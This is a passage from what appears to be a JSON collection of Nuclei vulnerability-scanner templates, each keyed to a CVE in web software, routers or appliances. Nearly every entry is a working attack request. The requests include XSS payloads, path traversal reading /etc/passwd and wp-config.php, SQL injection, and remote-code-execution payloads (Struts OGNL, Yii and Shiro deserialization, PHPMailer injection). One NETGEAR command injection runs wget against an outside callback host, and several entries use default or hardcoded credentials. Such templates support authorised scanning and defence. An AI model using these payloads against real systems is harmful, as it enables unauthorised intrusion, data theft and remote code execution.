application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/&action=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2020-24949","info":{"name":"PHP-Fusion 9.03.50 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/infusions/downloads/downloads.php?cat_id=${system(ls)}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["infusion_db.php"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11710","info":{"name":"Kong Admin <=2.03 - Admin API Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Welcome to kong","configuration","kong_env"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-19515","info":{"name":"qdPM 9.1 - Cross-site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/install/index.php?step=database_config&db_error=<img%20src=x%20onerror=alert(document.domain)%20/>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain) />","qdPM"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35338","info":{"name":"Wireless Multiplex Terminal Playout Server <=20.2.8 - Default Credential Detection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/server/"],"headers":{"Authorization":"Basic OnBva29u"},"matchers-condition":"and","matchers":[{"type":"word","words":["<title>WMT Server playout"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26214","info":{"name":"Alerta < 8.1.0 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/config"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 8.1.0')"]},{"type":"word","part":"body","words":["\"alarm_model\"","\"actions\"","\"severity\""],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\"name\": \"Alerta ([0-9.]+)\""],"internal":true},{"type":"regex","group":1,"regex":["\"name\": \"Alerta ([0-9.]+)\""]}]}]},{"id":"CVE-2020-23015","info":{"name":"OPNsense <=20.1.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?url=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2020-12478","info":{"name":"TeamPass 2.1.27.36 - Improper Authentication","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/files/ldap.debug.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Get all LDAP params"]},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15148","info":{"name":"Yii 2 < 2.0.38 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ=="],"matchers-condition":"and","matchers":[{"type":"word","words":["total","An internal server error occurred."],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-13942","info":{"name":"Apache Unomi <1.5.2 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/context.json"],"body":"{\n  \"filters\": [\n    {\n      \"id\": \"{{id}}\",\n      \"filters\": [\n        {\n          \"condition\": {\n            \"parameterValues\": {\n              \"nuclei\": \"script::Runtime.getRuntime().exec('id')\"\n            },\n            \"type\": \"profilePropertyCondition\"\n          }\n        }\n      ]\n    }\n  ],\n  \"sessionId\": \"nuclei\"\n}\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json","context-profile-id"],"condition":"and"},{"type":"regex","part":"body","regex":["(profile|session)(Id|Properties|Segments)","[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-20988","info":{"name":"DomainMOD 4.13.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /reporting/domains/cost-by-owner.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndaterange=%22%2F%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"value=\\\"\\\"/><script>alert(document.domain)</script>\")","contains(body_2, \"DomainMOD\")"],"condition":"and"}]}]},{"id":"CVE-2004-0519","info":{"name":"SquirrelMail 1.4.x - Folder Name Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2004-1965","info":{"name":"Open Bulletin Board (OpenBB) v1.0.6 - Open Redirect/XSS","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?redirect=http%3A%2F%2Fwww.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2016-4437","info":{"name":"Apache Shiro 1.2.4 Cookie RememberME - Deserial Remote Code Execution Vulnerability","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: rememberMe={{base64(concat(base64_decode(\"QUVTL0NCQy9QS0NTNVBhZA==\"),aes_cbc(base64_decode(generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\")), base64_decode(\"kPH+bIxk5D2deZiIxcaaaA==\"), base64_decode(\"QUVTL0NCQy9QS0NTNVBhZA==\"))))}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2016-10134","info":{"name":"Zabbix - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)::"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Error in query [INSERT INTO profiles (profileid, userid","You have an error in your SQL syntax"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-0957","info":{"name":"Adobe AEM Dispatcher <4.15 - Rules Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/system/console?.css"],"headers":{"Authorization":"Basic YWRtaW46YWRtaW4K"},"matchers-condition":"and","matchers":[{"type":"word","words":["Adobe","java.lang","(Runtime)"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000129","info":{"name":"WordPress defa-online-image-protector <=3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/defa-online-image-protector/redirect.php?r=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000143","info":{"name":"WordPress Photoxhibit 2.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10367","info":{"name":"Opsview Monitor Pro - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/monitoring/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2016-2389","info":{"name":"SAP xMII 15.0 for SAP NetWeaver 7.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000141","info":{"name":"WordPress Page Layout builder v1.9.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000146","info":{"name":"WordPress Pondol Form to Mail <=1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-4977","info":{"name":"Spring Security OAuth2 Remote Command Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Unsupported response types: [978015547]"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2016-10993","info":{"name":"ScoreMe Theme - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?s=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-5649","info":{"name":"NETGEAR DGN2200 / DGND3700 - Admin Password Disclosure","severity":"critical"},"requests":[{"raw":["GET /BSW_cxttongr.htm HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Smart Wizard Result</title> "]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"password","group":1,"regex":["<b>Success \"([a-z]+)\""],"part":"body"}]}]},{"id":"CVE-2016-1000135","info":{"name":"WordPress HDW Video Gallery <=1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/hdw-tube/mychannel.php?channel=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000128","info":{"name":"WordPress anti-plagiarism <=3.60 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000132","info":{"name":"WordPress enhanced-tooltipglossary 3.2.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&msg=imported"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10973","info":{"name":"Brafton WordPress Plugin < 3.4.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=BraftonArticleLoader&tab=alert%28document.domain%29 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"tab = alert(document.domain);\")","contains(body_2, \"Brafton Article Loader\")"],"condition":"and"}]}]},{"id":"CVE-2016-7834","info":{"name":"Sony IPELA Engine IP Camera - Hardcoded Account","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/command/prima-factory.cgi"],"headers":{"Authorization":"Bearer cHJpbWFuYTpwcmltYW5h"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["gen5th","gen6th"],"condition":"or"},{"type":"status","status":[204]}]}]},{"id":"CVE-2016-1000154","info":{"name":"WordPress WHIZZ <=1.0.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/whizz/plugins/delete-plugin.php?plugin=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000153","info":{"name":"WordPress Tidio Gallery <=1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-6601","info":{"name":"ZOHO WebNMS Framework <5.2 SP1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/servlets/FetchFile?fileName=../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-3978","info":{"name":"Fortinet FortiOS  - Open Redirect/Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login?redir=http://www.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2016-1000134","info":{"name":"WordPress HDW Video Gallery <=1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10940","info":{"name":"WordPress zm-gallery plugin 1.0 SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7422)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7421)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 302 && status_code_2 == 200 && status_code_3 == 200","contains(body_2, \"[zm_gallery id=\")","contains(body_2, \"<th scope=\\\"row\\\" class=\\\"check-column\\\">\")","!contains(body_3, \"<th scope=\\\"row\\\" class=\\\"check-column\\\">\")"],"condition":"and"}]}]},{"id":"CVE-2016-1555","info":{"name":"NETGEAR WNAP320 Access Point Firmware - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /boardDataWW.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nmacAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23&reginfo=0&writeData=Submit\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2016-10924","info":{"name":"Wordpress Zedna eBook download <1.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-6277","info":{"name":"NETGEAR Routers - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/;cat$IFS/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000133","info":{"name":"WordPress forget-about-shortcode-buttons 1.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10368","info":{"name":"Opsview Monitor Pro - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin_username={{username}}&login_password={{password}}&login=&back=//www.interact.sh&app=OPSVIEW\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2016-1000130","info":{"name":"WordPress e-search <=1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/e-search/tmpl/date_select.php?date-from=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000138","info":{"name":"WordPress Admin Font Editor <=1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10033","info":{"name":"WordPress PHPMailer < 5.2.18 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /?author=1 HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\n\n","POST /wp-login.php?action=lostpassword HTTP/1.1\nHost: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null)\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nwp-submit=Get+New+Password&redirect_to=&user_login={{username}}\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["wp-login.php?checkemail=confirm"]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","name":"username","group":1,"regex":["Author:(?:[A-Za-z0-9 -\\_=\"]+)?<span(?:[A-Za-z0-9 -\\_=\"]+)?>([A-Za-z0-9]+)<\\/span>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2016-3081","info":{"name":"Apache S2-032 Struts - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000137","info":{"name":"WordPress Hero Maps Pro 2.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-7552","info":{"name":"Trend Micro Threat Discovery Appliance 2.6.1062r1 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/logoff.cgi"],"headers":{"Cookie":"session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Memory map"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000126","info":{"name":"WordPress Admin Font Editor <=1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000155","info":{"name":"WordPress WPSOLR <=8.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000152","info":{"name":"WordPress Tidio-form <=1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/tidio-form/popup-insert-help.php?formId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000131","info":{"name":"WordPress e-search <=1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000139","info":{"name":"WordPress Infusionsoft Gravity Forms <=1.5.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain);</script><\"","input type=\"text\" name=\"ContactId\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000127","info":{"name":"WordPress AJAX Random Post <=2.00 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-8527","info":{"name":"Aruba Airwave <8.2.3.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/visualrf/group_list.xml?aps=1&start=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&end=500&match"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000136","info":{"name":"WordPress heat-trackr 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-3088","info":{"name":"Apache ActiveMQ Fileserver - Arbitrary File Write","severity":"critical"},"requests":[{"raw":["PUT /fileserver/{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n\n{{rand1}}\n","GET /fileserver/{{randstr}}.txt 